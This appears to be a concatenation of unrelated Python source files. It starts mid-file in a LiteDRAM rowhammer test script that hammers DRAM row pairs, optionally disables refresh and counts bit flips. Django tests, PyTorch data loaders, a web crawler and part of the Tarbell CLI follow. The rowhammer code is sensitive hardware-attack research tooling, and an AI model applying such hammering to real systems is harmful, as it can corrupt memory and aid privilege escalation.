for name, val in locals().items():
setattr(self, name, val)
self.converter = DRAMAddressConverter.load()
self._addresses_per_row = {}
@property
def rows(self):
return list(range(self.rows_start, self.nrows))
def addresses_per_row(self, row):
# Calculate the addresses lazily and cache them
if row not in self._addresses_per_row:
addresses = [
self.converter.encode_bus(bank=self.bank, col=col, row=row)
for col in range(2**self.settings.geom.colbits)
]
self._addresses_per_row[row] = addresses
return self._addresses_per_row[row]
def attack(self, row_tuple, read_count, progress_header=''):
# Make sure that the row hammer module is in reset state
self.wb.regs.rowhammer_enabled.write(0)
self.wb.regs.rowhammer_count.read() # clears the value
# Configure the row hammer attacker
assert len(
row_tuple
) == 2, 'Use BIST modules/Payload Executor to row hammer different number of rows than 2'
addresses = [
self.converter.encode_dma(bank=self.bank, col=self.column, row=r) for r in row_tuple
]
self.wb.regs.rowhammer_address1.write(addresses[0])
self.wb.regs.rowhammer_address2.write(addresses[1])
self.wb.regs.rowhammer_enabled.write(1)
row_strw = len(str(2**self.settings.geom.rowbits - 1))
def progress(count):
s = ' {}'.format(progress_header + ' ' if progress_header else '')
s += 'Rows = {}, Count = {:5.2f}M / {:5.2f}M'.format(
row_tuple, count / 1e6, read_count / 1e6, n=row_strw)
print(s, end=' \r')
while True:
count = self.wb.regs.rowhammer_count.read()
progress(count)
if count >= read_count:
break
self.wb.regs.rowhammer_enabled.write(0)
progress(self.wb.regs.rowhammer_count.read()) # also clears the value
print()
def row_access_iterator(self, burst=16):
for row in self.rows:
addresses = self.addresses_per_row(row)
n = (max(addresses) - min(addresses)) // 4
base_addr = addresses[0]
yield row, n, base_addr
def check_errors(self, row_patterns, row_progress=16):
row_errors = {}
for row, n, base in self.row_access_iterator():
errors = memcheck(self.wb, n, pattern=row_patterns[row], base=base, burst=255)
row_errors[row] = [(addr, data, row_patterns[row]) for addr, data in errors]
if row % row_progress == 0:
print('.', end='', flush=True)
return row_errors
def errors_count(self, row_errors):
return sum(1 if len(e) > 0 else 0 for e in row_errors.values())
@staticmethod
def bitcount(x):
return bin(x).count('1') # seems faster than operations on integers
@classmethod
def bitflips(cls, val, ref):
return cls.bitcount(val ^ ref)
def errors_bitcount(self, row_errors):
return sum(
sum(self.bitflips(value, expected)
for addr, value, expected in e)
for e in row_errors.values())
def display_errors(self, row_errors):
for row in row_errors:
if len(row_errors[row]) > 0:
print(
"Bit-flips for row {:{n}}: {}".format(
row,
sum(
self.bitflips(value, expected)
for addr, value, expected in row_errors[row]),
n=len(str(2**self.settings.geom.rowbits - 1))))
if self.verbose:
for i, word, expected in row_errors[row]:
base_addr = min(self.addresses_per_row(row))
addr = base_addr + 4 * i
bank, _row, col = self.converter.decode_bus(addr)
print(
"Error: 0x{:08x}: 0x{:08x} (row={}, col={})".format(addr, word, _row, col))
if self.plot:
from matplotlib import pyplot as plt
row_err_counts = [len(row_errors.get(row, [])) for row in self.rows]
plt.bar(self.rows, row_err_counts, width=1)
plt.grid(True)
plt.xlabel('Row')
plt.ylabel('Errors')
plt.show()
def run(self, row_pairs, pattern_generator, read_count, row_progress=16, verify_initial=False):
# TODO: need to invert data when writing/reading, make sure Python integer inversion works correctly
if self.data_inversion:
raise NotImplementedError('Currently only HW rowhammer supports data inversion')
print('\nPreparing ...')
row_patterns = pattern_generator(self.rows)
print('\nFilling memory with data ...')
for row, n, base in self.row_access_iterator():
memfill(self.wb, n, pattern=row_patterns[row], base=base, burst=255)
if row % row_progress == 0:
print('.', end='', flush=True)
# makes sure to synchronize with the writes (without it for slower conenction
# we may have a timeout on the first read after writing)
self.wb.regs.ctrl_scratch.read()
if verify_initial:
print('\nVerifying written memory ...')
errors = self.check_errors(row_patterns, row_progress=row_progress)
if self.errors_count(errors) == 0:
print('OK')
else:
print()
self.display_errors(errors)
return
if self.no_refresh:
print('\nDisabling refresh ...')
self.wb.regs.controller_settings_refresh.write(0)
print('\nRunning row hammer attacks ...')
for i, row_tuple in enumerate(row_pairs):
s = 'Iter {:{n}} / {:{n}}'.format(i, len(row_pairs), n=len(str(len(row_pairs))))
if self.payload_executor:
self.payload_executor_attack(read_count=read_count, row_tuple=row_tuple)
else:
self.attack(row_tuple, read_count=read_count, progress_header=s)
if self.no_refresh:
print('\nReenabling refresh ...')
self.wb.regs.controller_settings_refresh.write(1)
print('\nVerifying attacked memory ...')
errors = self.check_errors(row_patterns, row_progress=row_progress)
if self.errors_count(errors) == 0:
print('OK')
else:
print()
self.display_errors(errors)
return
def payload_executor_attack(self, read_count, row_tuple):
sys_clk_freq = float(get_generated_defs()['SYS_CLK_FREQ'])
payload = generate_row_hammer_payload(
read_count=read_count,
row_sequence=row_tuple,
timings=self.settings.timing,
bankbits=self.settings.geom.bankbits,
bank=self.bank,
payload_mem_size=self.wb.mems.payload.size,
refresh=not self.no_refresh,
sys_clk_freq=sys_clk_freq,
)
print('\nTransferring the payload ...')
memwrite(self.wb, payload, base=self.wb.mems.payload.base)
def ready():
status = self.wb.regs.payload_executor_status.read()
return (status & 1) != 0
print('\nExecuting ...')
assert ready()
start = time.time()
self.wb.regs.payload_executor_start.write(1)
while not ready():
time.sleep(0.001)
elapsed = time.time() - start
print('Time taken: {:.3f} ms\n'.format(elapsed * 1e3))
################################################################################
def patterns_const(rows, value):
return {row: value for row in rows}
def patterns_alternating_per_row(rows):
return {row: 0xffffffff if row % 2 == 0 else 0x00000000 for row in rows}
def patterns_random_per_row(rows, seed=42):
rng = random.Random(seed)
return {row: rng.randint(0, 2**32 - 1) for row in rows}
def main(row_hammer_cls):
parser = argparse.ArgumentParser()
parser.add_argument('--nrows', type=int, default=0, help='Number of rows to consider')
parser.add_argument('--bank', type=int, default=0, help='Bank number')
parser.add_argument('--column', type=int, default=512, help='Column to read from')
parser.add_argument(
'--start-row', type=int, default=0, help='Starting row (range = (start, start+nrows))')
parser.add_argument(
'--read_count',
type=float,
default=10e6,
help='How many reads to perform for single address pair')
parser.add_argument('--hammer-only', nargs=2, type=int, help='Run only the row hammer attack')
parser.add_argument(
'--no-refresh', action='store_true', help='Disable refresh commands during the attacks')
parser.add_argument(
'--pattern',
default='01_per_row',
choices=['all_0', 'all_1', '01_in_row', '01_per_row', 'rand_per_row'],
help='Pattern written to DRAM before running attacks')
parser.add_argument(
'--row-pairs',
choices=['sequential', 'const', 'random'],
default='sequential',
help='How the rows for subsequent attacks are selected')
parser.add_argument(
'--const-rows-pair',
type=int,
nargs='+',
required=False,
help='When using --row-pairs constant')
parser.add_argument(
'--plot', action='store_true',
help='Plot errors distribution') # requiers matplotlib and pyqt5 packages
parser.add_argument(
'--payload-executor',
action='store_true',
help='Do the attack using Payload Executor (1st row only)')
parser.add_argument('-v', '--verbose', action='store_true', help='Be more verbose')
parser.add_argument("--srv", action="store_true", help='Start LiteX server')
parser.add_argument(
"--experiment-no", type=int, default=0, help='Run preconfigured experiment #no')
parser.add_argument(
"--data-inversion", nargs=2, help='Invert pattern data for victim rows (divisor, mask)')
args = parser.parse_args()
if args.experiment_no == 1:
args.nrows = 512
args.read_count = 15e6
args.pattern = '01_in_row'
args.row_pairs = 'const'
args.const_rows_pair = 88, 99
args.no_refresh = True
if args.srv:
litex_server()
wb = RemoteClient()
wb.open()
row_hammer = row_hammer_cls(wb, nrows=args.nrows, settings=get_litedram_settings(), column=args.column, bank=args.bank, rows_start=args.start_row, verbose=args.verbose, plot=args.plot, no_refresh=args.no_refresh, payload_executor=args.payload_executor, data_inversion=args.data_inversion)
if args.hammer_only:
row_hammer.attack(*args.hammer_only, read_count=args.read_count)
else:
rng = random.Random(42)
def rand_row():
return rng.randint(args.start_row, args.start_row + args.nrows)
assert not (
args.row_pairs == 'const' and not args.const_rows_pair), 'Specify --const-rows-pair'
row_pairs = {
'sequential': [(0 + args.start_row, i + args.start_row) for i in range(args.nrows)],
'const': [tuple(args.const_rows_pair) if args.const_rows_pair else ()],
'random': [(rand_row(), rand_row()) for i in range(args.nrows)],
}[args.row_pairs]
pattern = {
'all_0': lambda rows: patterns_const(rows, 0x00000000),
'all_ones': lambda rows: patterns_const(rows, 0xffffffff),
'01_in_row': lambda rows: patterns_const(rows, 0xaaaaaaaa),
'01_per_row': patterns_alternating_per_row,
'rand_per_row': patterns_random_per_row,
}[args.pattern]
row_hammer.run(row_pairs=row_pairs, read_count=args.read_count, pattern_generator=pattern)
wb.close()
if __name__ == "__main__":
main(row_hammer_cls=RowHammer)
```
|
{
"source": "jedrzejkozal/QuestionsAndAnswers",
"score": 2
}
|
#### File: ask/test/FriendsViewTest.py
```python
from django.shortcuts import reverse
from django.test import TestCase
from ..test.FriendsMixIn import *
from ..test.LoginMixIn import *
class FriendsViewTest(TestCase, FriendsMixIn, LoginMixIn):
def setUp(self):
self.create_users()
self.make_friends()
self.create_invitations()
def test_friends_relation_is_mutual(self):
self.assertEqual(
self.user1, self.user2.friends_second.all()[0].first)
self.assertEqual(self.user2, self.user1.friends.all()[0])
def test_GET_all_friends_are_returned(self):
self.login_user(username="TestUser1")
response = self.client.get(reverse('ask:friends'))
self.assertEqual(list(response.context['friends']),
[self.user2, self.user3, self.user5])
def test_GET_all_friends_of_user2_are_returned(self):
self.login_user(username="TestUser2")
response = self.client.get(reverse('ask:friends'))
self.assertEqual(list(response.context['friends']),
[self.user4, self.user1, self.user5])
def test_GET_recently_added_returns_sorted_friends_user1(self):
self.login_user(username="TestUser1")
response = self.client.get(reverse('ask:friends.recent'))
self.assertEqual(list(response.context['friends']),
[self.user5, self.user3, self.user2])
def test_GET_recently_added_returns_sorted_friends_user2(self):
self.login_user(username="TestUser2")
response = self.client.get(reverse('ask:friends.recent'))
self.assertEqual(list(response.context['friends']),
[self.user5, self.user4, self.user1])
def test_GET_recently_added_returns_sorted_friends_user5(self):
self.login_user(username="TestUser5")
response = self.client.get(reverse('ask:friends.recent'))
self.assertEqual(list(response.context['friends']),
[self.user6, self.user4, self.user3, self.user2, self.user1])
def test_GET_in_alphabetical_order_user1(self):
self.login_user(username="TestUser1")
response = self.client.get(reverse('ask:friends.alph'))
self.assertEqual(list(response.context['friends']),
[self.user2, self.user3, self.user5])
def test_GET_in_alphabetical_order_user2(self):
self.login_user(username="TestUser2")
response = self.client.get(reverse('ask:friends.alph'))
self.assertEqual(list(response.context['friends']),
[self.user1, self.user4, self.user5])
def test_GET_in_alphabetical_order_user5(self):
self.login_user(username="TestUser5")
response = self.client.get(reverse('ask:friends.alph'))
self.assertEqual(list(response.context['friends']),
[self.user1, self.user2, self.user3, self.user4, self.user6])
def test_GET_inv_call_context_show_invites_eq_True(self):
self.login_user(username="TestUser1")
response = self.client.get(reverse('ask:friends.inv'))
self.assertEqual(response.context['show_invites'], True)
def test_GET_inv_no_invitations_empty_query(self):
self.login_user(username="TestUser1")
response = self.client.get(reverse('ask:friends.inv'))
self.assertEqual(list(response.context['invitations']), [])
def test_GET_inv_context_invitations_for_user2(self):
self.login_user(username="TestUser2")
response = self.client.get(reverse('ask:friends.inv'))
self.assertEqual(list(response.context['invitations']), [self.user8])
def test_GET_inv_context_invitations_for_user8(self):
self.login_user(username="TestUser8")
response = self.client.get(reverse('ask:friends.inv'))
self.assertEqual(list(response.context['invitations']), [
self.user2, self.user5, self.user6, self.user3])
def test_GET_inv_context_invitations_for_user6(self):
self.login_user(username="TestUser6")
response = self.client.get(reverse('ask:friends.inv'))
self.assertEqual(list(response.context['invitations']), [
self.user8, self.user4])
```
#### File: ask/test/QuestionsMixIn.py
```python
from ..models import UserModel, AnswerModel, QuestionModel
class QuestionsMixIn:
def create_users(self):
self.test_user1 = UserModel(username="TestUser1")
self.test_user1.save()
self.test_user2 = UserModel(username="TestUser2")
self.test_user2.save()
self.test_user3 = UserModel(username="TestUser3")
self.test_user3.save()
def create_question1(self, with_answer=False):
if with_answer:
self.create_answer1()
answer = self.answer1
else:
answer = None
self.question1 = QuestionModel(
asked_by=self.test_user1, owner=self.test_user2, content="Test Question 1", answer=answer)
self.question1.save()
def create_question2(self, with_answer=False):
if with_answer:
self.create_answer2()
answer = self.answer2
else:
answer = None
self.question2 = QuestionModel(
asked_by=self.test_user3, owner=self.test_user2, content="Test Question 2", answer=answer)
self.question2.save()
def create_question3(self, with_answer=False):
if with_answer:
self.create_answer3()
answer = self.answer3
else:
answer = None
self.question3 = QuestionModel(
asked_by=self.test_user1, owner=self.test_user3, content="Test Question 3", answer=answer)
def create_answer1(self):
self.answer1 = AnswerModel(content="Test Answer 1")
self.answer1.save()
def create_answer2(self):
self.answer2 = AnswerModel(content="Test Answer 2")
self.answer2.save()
def create_answer3(self):
self.answer3 = AnswerModel(content="Test Answer 3")
self.answer3.save()
```
|
{
"source": "jedrzejpolaczek/artificial_intelligence_templates",
"score": 3
}
|
#### File: ImageClassifier/predict_utils/print_results.py
```python
import json
def print_results(top_p: list, top_class: list, category_names: str):
# Load classes classifier will use
with open(category_names, 'r') as f:
cat_to_name = json.load(f)
index = 0
for elem in top_class:
print(f"Flower: {cat_to_name[str(int(elem))]} : {top_p[index]*100:.0f}%")
index += 1
```
#### File: ImageClassifier/train_utils/get_loader.py
```python
import torch
from torchvision import transforms
from torchvision import datasets
def get_directories(data_dir: str) -> dict:
train_dir = data_dir + '/train'
valid_dir = data_dir + '/valid'
test_dir = data_dir + '/test'
return {'train': train_dir, 'valid': valid_dir, 'test':test_dir}
def get_transforms() -> dict:
train_transform = transforms.Compose([transforms.RandomRotation(30),
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])])
valid_transform = transforms.Compose([transforms.Resize(255),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])])
test_transform = transforms.Compose([transforms.Resize(255),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])])
return {'train': train_transform, 'valid': valid_transform, 'test':test_transform}
def get_datasets(directories: dict, transforms: dict) -> dict:
train_dataset = datasets.ImageFolder(directories['train'], transform=transforms['train'])
valid_dataset = datasets.ImageFolder(directories['valid'], transform=transforms['valid'])
test_dataset = datasets.ImageFolder(directories['test'], transform=transforms['test'])
return {'train': train_dataset, 'valid': valid_dataset, 'test':test_dataset}
def get_loader(data_dir: str) -> dict:
# Create directories based on passed path
directories = get_directories(data_dir)
# Defined of transforms for the training, validation and testing sets
transforms = get_transforms()
# Load the datasets with ImageFolder for train set
datasets = get_datasets(directories, transforms)
# Defined the dataloaders, using the image datasets and the trainforms
train_loader = torch.utils.data.DataLoader(datasets['train'], batch_size=64, shuffle=True)
valid_loader = torch.utils.data.DataLoader(datasets['valid'], batch_size=32)
test_loader = torch.utils.data.DataLoader(datasets['test'], batch_size=32)
return {'train': train_loader, 'valid': valid_loader, 'test':test_loader}
```
#### File: src/tests/test_root.py
```python
from http import HTTPStatus
import pytest
from httpx import AsyncClient
# Internal libraries
from main import app
@pytest.mark.asyncio
async def test_root():
async with AsyncClient(app=app, base_url="http://test") as ac:
response = await ac.get("/")
assert response.status_code == HTTPStatus.OK
assert response.json() == {"STATUS": "Klinesso Recommender API"}
```
|
{
"source": "jedrzejpolaczek/code_snippets",
"score": 3
}
|
#### File: code_snippets/Python/WebCrawler.py
```python
import requests
from bs4 import BeautifulSoup
def code_search(max_pages):
page = 1
print("Before")
while page <= max_pages:
print("In")
url = 'https://www.thenewboston.com/forum/recent_activity.php?page=' + str(page)
source_code = requests.get(url)
plain_txt = source_code.text
soup = BeautifulSoup(plain_txt, "html.parser")
with open("file_name.txt", 'w', encoding='UTF-8') as inFile:
inFile.write(plain_txt)
for link in soup.findAll('a'):
href = "https://www.thenewboston.com" + link.get('href')
title = link.string
#print(href)
#print(title)
get_single_item_data(href)
page += 1
print("After")
def get_single_item_data(item_url):
source_code = requests.get(item_url)
plain_txt = source_code.text
soup = BeautifulSoup(plain_txt)
for item_name in soup.findAll("a", {"class":"title"}):
print(item_name.string)
code_search(1)
```
|
{
"source": "jedStevens/material_exporter",
"score": 2
}
|
#### File: material_exporter/material_exporter/material_exporter.py
```python
import sys
import time
from PyQt5.QtWidgets import *
from krita import *
class MaterialExporterDocker(DockWidget):
def __init__(self):
super().__init__()
self.setWindowTitle('Material Exporter')
mainWidget = QWidget(self)
self.setWidget(mainWidget)
self.export_button = QPushButton("Export")
self.export_button.clicked.connect(self.export)
self.base_edit = QLineEdit("/home/user/")
self.model_edit = QLineEdit("model_name")
self.material_edit = QLineEdit("material_name")
mainWidget.setLayout(QFormLayout())
mainWidget.layout().addRow(QLabel("Base Project: "), self.base_edit)
mainWidget.layout().addRow(QLabel("Model: "), self.model_edit)
mainWidget.layout().addRow(QLabel("Material: "), self.material_edit)
mainWidget.layout().addRow(QLabel(""), self.export_button)
def canvasChanged(self, canvas):
pass
def set_base_layers(self, b, nodes):
for child in nodes:
child.setVisible(b)
def set_layer(self, n, b, nodes):
for child in nodes:
if str(child.name()) == n:
child.setVisible(b)
def export(self):
doc = Krita.instance().activeDocument()
root = doc.rootNode()
nodes = root.childNodes()
# Texture Library
base_folder = self.base_edit.text()
# Character / Piece
project_folder = self.model_edit.text()
# Object your working on
base_name = self.material_edit.text()
format = '.png'
doc.setBatchmode(True)
original_v = []
for child in nodes:
original_v.append(child.visible())
for child in nodes:
if str(child.name()) == 'bg':
child.setVisible(True)
continue
if str(child.name())in ['ao', 'alb', 'rgh', 'mtl', 'emi'] and len(child.childNodes()) > 0:
self.set_base_layers(False, nodes)
self.set_layer('bg', True, nodes)
child.setVisible(True)
doc.refreshProjection()
filename = base_folder + '/' + project_folder + ('/' + base_name)*2 + "_" + str(child.name()) + format
print("Saving: " + filename)
doc.saveAs(filename)
for i in range(len(nodes)):
nodes[i].setVisible(original_v[i])
doc.refreshProjection()
doc.save()
doc.setBatchmode(False)
Krita.instance().addDockWidgetFactory(DockWidgetFactory("material_exporter", DockWidgetFactoryBase.DockRight, MaterialExporterDocker))
```
|
{
"source": "j-e-d/tarbell",
"score": 2
}
|
#### File: tarbell/tarbell/cli.py
```python
import codecs
import glob
import imp
import jinja2
import os
import pkg_resources
import sh
import shutil
import socket
import sys
import tempfile
import webbrowser
# Import readline without breaking process backgrounding on some OS X versions
# See https://github.com/tarbell-project/tarbell/issues/291
import signal
signal.signal(signal.SIGTTOU, signal.SIG_IGN)
import gnureadline
from apiclient import errors
from apiclient.http import MediaFileUpload as _MediaFileUpload
from clint import arguments
from clint.textui import colored
from six.moves import input as raw_input
from tarbell import __VERSION__ as VERSION
MAJOR_VERSION = '.'.join(VERSION.split('.')[:2])
# Handle relative imports from binary, see https://github.com/newsapps/flask-tarbell/issues/87
if __name__ == "__main__" and __package__ is None:
__package__ = "tarbell.cli"
from .app import process_xlsx, copy_global_values
from .template import pprint_lines
from .oauth import get_drive_api
from .contextmanagers import ensure_settings, ensure_project
from .configure import tarbell_configure
from .s3 import S3Url, S3Sync
from .settings import Settings
from .utils import list_get, split_sentences, show_error
from .utils import puts, is_werkzeug_process
# Set args
args = arguments.Args()
# --------
# Dispatch
# --------
def main():
"""
Primary Tarbell command dispatch.
"""
command = Command.lookup(args.get(0))
if len(args) == 0 or args.contains(('-h', '--help', 'help')):
display_info(args)
sys.exit(1)
elif args.contains(('-v', '--version')):
display_version()
sys.exit(1)
elif command:
arg = args.get(0)
args.remove(arg)
command.__call__(command, args)
sys.exit()
else:
show_error(colored.red('Error! Unknown command \'{0}\'.\n'
.format(args.get(0))))
display_info(args)
sys.exit(1)
def display_info(args):
"""
Displays Tarbell info.
"""
puts('\nTarbell: Simple web publishing\n')
puts('Usage: {0}\n'.format(colored.cyan('tarbell <command>')))
puts('Commands:\n')
for command in Command.all_commands():
usage = command.usage or command.name
help = command.help or ''
puts('{0} {1}'.format(
colored.yellow('{0: <37}'.format(usage)),
split_sentences(help, 37)
))
puts("")
settings = Settings()
if settings.file_missing:
puts('---\n{0}: {1}'.format(
colored.red("Warning"),
"No Tarbell configuration found. Run:"
))
puts('\n{0}'.format(
colored.green("tarbell configure")
))
puts('\n{0}\n---'.format(
"to configure Tarbell."
))
def display_version():
"""
Displays Tarbell version/release.
"""
puts('You are using Tarbell v{0}'.format(
colored.green(VERSION)
))
def tarbell_generate(command, args, skip_args=False, extra_context=None, quiet=False):
"""
Generate static files.
"""
output_root = None
with ensure_settings(command, args) as settings, ensure_project(command, args) as site:
if not skip_args:
output_root = list_get(args, 0, False)
if output_root:
is_folder = os.path.exists(output_root)
else:
puts("\nYou must specify an output directory (e.g. `{0}`)".format(
colored.cyan("tarbell generate _out")
))
sys.exit()
if quiet:
site.quiet = True
if not output_root:
output_root = tempfile.mkdtemp(prefix="{0}-".format(site.project.__name__))
is_folder = False
if args.contains('--context'):
site.project.CONTEXT_SOURCE_FILE = args.value_after('--context')
if args.contains('--overwrite'):
is_folder = False
#check to see if the folder we're trying to create already exists
if is_folder:
output_file = raw_input(("\nA folder named {0} already exists! Do you want to delete it? (selecting 'N' will quit) [y/N] ").format(
output_root
))
if output_file and output_file.lower() == "y":
puts(("\nDeleting {0}...\n").format(
colored.cyan(output_root)
))
_delete_dir(output_root)
else:
puts("\nNot overwriting. See ya!")
sys.exit()
site.generate_static_site(output_root, extra_context)
if not quiet:
puts("\nCreated site in {0}".format(colored.cyan(output_root)))
return output_root
def tarbell_install(command, args):
"""
Install a project.
"""
with ensure_settings(command, args) as settings:
project_url = args.get(0)
puts("\n- Getting project information for {0}".format(project_url))
project_name = project_url.split("/").pop()
error = None
# Create a tempdir and clone
tempdir = tempfile.mkdtemp()
try:
testgit = sh.git.bake(_cwd=tempdir, _tty_in=True, _tty_out=False) # _err_to_out=True)
testclone = testgit.clone(project_url, '.', '--depth=1', '--bare')
puts(testclone)
config = testgit.show("HEAD:tarbell_config.py")
puts("\n- Found tarbell_config.py")
path = _get_path(_clean_suffix(project_name, ".git"), settings)
_mkdir(path)
git = sh.git.bake(_cwd=path)
clone = git.clone(project_url, '.', _tty_in=True, _tty_out=False, _err_to_out=True)
puts(clone)
puts(git.submodule.update('--init', '--recursive', _tty_in=True, _tty_out=False, _err_to_out=True))
_install_requirements(path)
# Get site, run hook
with ensure_project(command, args, path) as site:
site.call_hook("install", site, git)
except sh.ErrorReturnCode_128 as e:
if e.message.endswith('Device not configured\n'):
error = 'Git tried to prompt for a username or password.\n\nTarbell doesn\'t support interactive sessions. Please configure ssh key access to your Git repository. (See https://help.github.com/articles/generating-ssh-keys/)'
else:
error = 'Not a valid repository or Tarbell project'
finally:
_delete_dir(tempdir)
if error:
show_error(error)
else:
puts("\n- Done installing project in {0}".format(colored.yellow(path)))
def tarbell_install_blueprint(command, args):
"""
Install a project template.
"""
with ensure_settings(command, args) as settings:
name = None
error = None
template_url = args.get(0)
matches = [template for template in settings.config["project_templates"] if template.get("url") == template_url]
tempdir = tempfile.mkdtemp()
if matches:
puts("\n{0} already exists. Nothing more to do.\n".format(
colored.yellow(template_url)
))
sys.exit()
try:
puts("\nInstalling {0}".format(colored.cyan(template_url)))
puts("\n- Cloning repo")
git = sh.git.bake(_cwd=tempdir, _tty_in=True, _tty_out=False, _err_to_out=True)
puts(git.clone(template_url, '.'))
_install_requirements(tempdir)
filename, pathname, description = imp.find_module('blueprint', [tempdir])
blueprint = imp.load_module('blueprint', filename, pathname, description)
puts("\n- Found _blueprint/blueprint.py")
name = blueprint.NAME
puts("\n- Name specified in blueprint.py: {0}".format(colored.yellow(name)))
settings.config["project_templates"].append({"name": name, "url": template_url})
settings.save()
except AttributeError:
name = template_url.split("/")[-1]
error = "\n- No name specified in blueprint.py, using '{0}'".format(colored.yellow(name))
except ImportError:
error = 'No blueprint.py found'
except sh.ErrorReturnCode_128 as e:
if e.stdout.strip('\n').endswith('Device not configured'):
error = 'Git tried to prompt for a username or password.\n\nTarbell doesn\'t support interactive sessions. Please configure ssh key access to your Git repository. (See https://help.github.com/articles/generating-ssh-keys/)'
else:
error = 'Not a valid repository or Tarbell project'
finally:
_delete_dir(tempdir)
if error:
show_error(error)
else:
puts("\n+ Added new project template: {0}".format(colored.yellow(name)))
def tarbell_list(command, args):
"""
List tarbell projects.
"""
with ensure_settings(command, args) as settings:
projects_path = settings.config.get("projects_path")
if not projects_path:
show_error("{0} does not exist".format(projects_path))
sys.exit()
puts("Listing projects in {0}\n".format(
colored.yellow(projects_path)
))
longest_title = 0
projects = []
for directory in os.listdir(projects_path):
project_path = os.path.join(projects_path, directory)
try:
filename, pathname, description = imp.find_module('tarbell_config', [project_path])
config = imp.load_module(directory, filename, pathname, description)
title = config.DEFAULT_CONTEXT.get("title", directory)
projects.append((directory, title))
if len(title) > longest_title:
longest_title = len(title)
except ImportError:
pass
if len(projects):
fmt = "{0: <"+str(longest_title+1)+"} {1}"
puts(fmt.format(
'title',
'project name'
))
for projectname, title in projects:
title = codecs.encode(title, 'utf8')
puts(colored.yellow(fmt.format(
title,
colored.cyan(projectname)
)))
puts("\nUse {0} to switch to a project".format(
colored.green("tarbell switch <project name>")
))
else:
puts("No projects found")
def tarbell_list_templates(command, args):
"""
List available Tarbell blueprints.
"""
with ensure_settings(command, args) as settings:
puts("\nAvailable project templates\n")
_list_templates(settings)
puts("")
def tarbell_publish(command, args):
"""
Publish to s3.
"""
with ensure_settings(command, args) as settings, ensure_project(command, args) as site:
bucket_name = list_get(args, 0, "staging")
try:
bucket_url = S3Url(site.project.S3_BUCKETS[bucket_name])
except KeyError:
show_error(
"\nThere's no bucket configuration called '{0}' in "
"tarbell_config.py.".format(colored.yellow(bucket_name)))
sys.exit(1)
extra_context = {
"ROOT_URL": bucket_url,
"S3_BUCKET": bucket_url.root,
"BUCKET_NAME": bucket_name,
}
tempdir = "{0}/".format(tarbell_generate(command,
args, extra_context=extra_context, skip_args=True, quiet=True))
try:
title = site.project.DEFAULT_CONTEXT.get("title", "")
puts("\nDeploying {0} to {1} ({2})\n".format(
colored.yellow(title),
colored.red(bucket_name),
colored.green(bucket_url)
))
# Get creds
if settings.config:
# If settings has a config section, use it
kwargs = settings.config['s3_credentials'].get(bucket_url.root)
if not kwargs:
kwargs = {
'access_key_id': settings.config.get('default_s3_access_key_id'),
'secret_access_key': settings.config.get('default_s3_secret_access_key'),
}
puts("Using default bucket credentials")
else:
puts("Using custom bucket configuration for {0}".format(bucket_url.root))
else:
# If no configuration exists, read from environment variables if possible
puts("Attemping to use AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY")
kwargs = {
'access_key_id': os.environ["AWS_ACCESS_KEY_ID"],
'secret_access_key': os.environ["AWS_SECRET_ACCESS_KEY"],
}
if not kwargs.get('access_key_id') and not kwargs.get('secret_access_key'):
show_error('S3 access is not configured. Set up S3 with {0} to publish.'
.format(colored.green('tarbell configure')))
sys.exit()
s3 = S3Sync(tempdir, bucket_url, **kwargs)
s3.deploy_to_s3()
site.call_hook("publish", site, s3)
puts("\nIf you have website hosting enabled, you can see your project at:")
puts(colored.green("http://{0}\n".format(bucket_url)))
except KeyboardInterrupt:
show_error("ctrl-c pressed, bailing out!")
finally:
_delete_dir(tempdir)
def tarbell_newproject(command, args):
"""
Create new Tarbell project.
"""
with ensure_settings(command, args) as settings:
# Set it up and make the directory
name = _get_project_name(args)
puts("Creating {0}".format(colored.cyan(name)))
path = _get_path(name, settings)
_mkdir(path)
try:
_newproject(command, path, name, settings)
except KeyboardInterrupt:
_delete_dir(path)
show_error("ctrl-c pressed, not creating new project.")
except:
_delete_dir(path)
show_error("Unexpected error: {0}".format(sys.exc_info()[0]))
raise
def tarbell_serve(command, args):
"""
Serve the current Tarbell project.
"""
with ensure_project(command, args) as site:
with ensure_settings(command, args) as settings:
address = list_get(args, 0, "").split(":")
ip = list_get(address, 0, settings.config['default_server_ip'])
port = int(list_get(address, 1, settings.config['default_server_port']))
puts("\n * Running local server. Press {0} to stop the server".format(colored.red("ctrl-c")))
puts(" * Edit this project's templates at {0}".format(colored.yellow(site.path)))
try:
if not is_werkzeug_process():
site.call_hook("server_start", site)
site.app.run(ip, port=port)
if not is_werkzeug_process():
site.call_hook("server_stop", site)
except socket.error:
show_error("Address {0} is already in use, please try another port or address."
.format(colored.yellow("{0}:{1}".format(ip, port))))
def tarbell_switch(command, args):
"""
Switch to a project.
"""
with ensure_settings(command, args) as settings:
projects_path = settings.config.get("projects_path")
if not projects_path:
show_error("{0} does not exist".format(projects_path))
sys.exit()
project = args.get(0)
args.remove(project)
project_path = os.path.join(projects_path, project)
if os.path.isdir(project_path):
os.chdir(project_path)
puts("\nSwitching to {0}".format(colored.red(project)))
tarbell_serve(command, args)
else:
show_error("{0} isn't a tarbell project".format(project_path))
def tarbell_credentials(command, args):
"""
Print current OAuth access token.
"""
api = get_drive_api()
puts(api.credentials.to_json())
def tarbell_update(command, args):
"""
Update the current tarbell project.
"""
with ensure_settings(command, args) as settings, ensure_project(command, args) as site:
puts("Updating to latest blueprint\n")
git = sh.git.bake(_cwd=site.base.base_dir)
# stash then pull
puts(colored.yellow("Stashing local changes"))
puts(git.stash())
puts(colored.yellow("Pull latest changes"))
puts(git.pull())
# need to pop any local changes back to get back on the original branch
# this may behave oddly if you have old changes stashed
if git.stash.list():
puts(git.stash.pop())
def tarbell_unpublish(command, args):
"""
Delete a project.
"""
with ensure_settings(command, args) as settings, ensure_project(command, args) as site:
show_error("Not implemented!")
def tarbell_spreadsheet(command, args):
"""
Open context spreadsheet
"""
with ensure_settings(command, args) as settings, ensure_project(command, args) as site:
try:
# First, try to get the Google Spreadsheet URL
spreadsheet_url = _google_spreadsheet_url(site.project.SPREADSHEET_KEY)
except AttributeError:
# The project doesn't seem to be using a Google Spreadsheet.
# Try the URL or path specified in the CONTEXT_SOURCE_FILE setting
try:
spreadsheet_url = _context_source_file_url(
